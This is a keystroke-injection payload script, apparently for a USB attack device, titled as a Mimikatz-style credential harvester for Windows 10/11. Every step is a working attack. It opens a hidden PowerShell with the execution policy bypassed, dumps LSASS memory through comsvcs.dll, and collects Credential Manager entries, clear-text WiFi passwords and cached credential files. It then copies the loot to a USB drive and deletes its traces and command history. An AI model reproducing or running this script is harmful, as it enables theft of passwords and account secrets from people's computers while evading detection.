# ============================================
# CREDENTIAL HARVEST - Mimikatz Style
# ============================================
# Purpose: Extract credentials from memory
# Target: Windows 10/11 (requires admin)
# Time: 30 seconds
# Author: D3n14l0f53rv1c3
# ============================================

DELAY 2000

GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -ExecutionPolicy Bypass
ENTER
DELAY 3000

STRING $td = "$env:TEMP\.creds"; md $td -Force
ENTER
DELAY 200

# Dump LSASS (requires admin)
STRING "=== LSASS DUMP ===" | Out-File "$td\creds.txt"
ENTER
STRING try {
ENTER
STRING   $p = Get-Process lsass
ENTER
STRING   $out = "$td\lsass.dmp"
ENTER
STRING   rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump $p.Id $out full
ENTER
STRING   "LSASS dumped: $out" | Out-File "$td\creds.txt" -Append
ENTER
STRING } catch {
ENTER
STRING   "LSASS dump failed - need admin" | Out-File "$td\creds.txt" -Append
ENTER
STRING }
ENTER
DELAY 1000

# Windows Credential Manager
STRING "=== CREDENTIAL MANAGER ===" | Out-File "$td\creds.txt" -Append
ENTER
STRING cmdkey /list | Out-File "$td\creds.txt" -Append
ENTER
DELAY 300

# Saved WiFi passwords
STRING "=== WIFI PASSWORDS ===" | Out-File "$td\creds.txt" -Append
ENTER
STRING (netsh wlan show profiles | Select-String ': (.+)').Matches.Groups.Groups[1].Value | ForEach-Object { netsh wlan show profile $_ key=clear } | Out-File "$td\creds.txt" -Append
ENTER
DELAY 500

# Cached credentials
STRING "=== CACHED CREDENTIALS ===" | Out-File "$td\creds.txt" -Append
ENTER
STRING Get-ChildItem "C:\Users\*\AppData\Local\Microsoft\Credentials\*" -ErrorAction SilentlyContinue | Out-File "$td\creds.txt" -Append
ENTER
DELAY 300

# Copy to USB
STRING if (Test-Path E:\) { md "E:\creds" -Force; Copy-Item "$td\*" "E:\creds\" -Force }
ENTER
DELAY 300

# Clean
STRING Remove-Item $td -Recurse -Force -ErrorAction SilentlyContinue
ENTER
STRING Clear-History; exit
ENTER
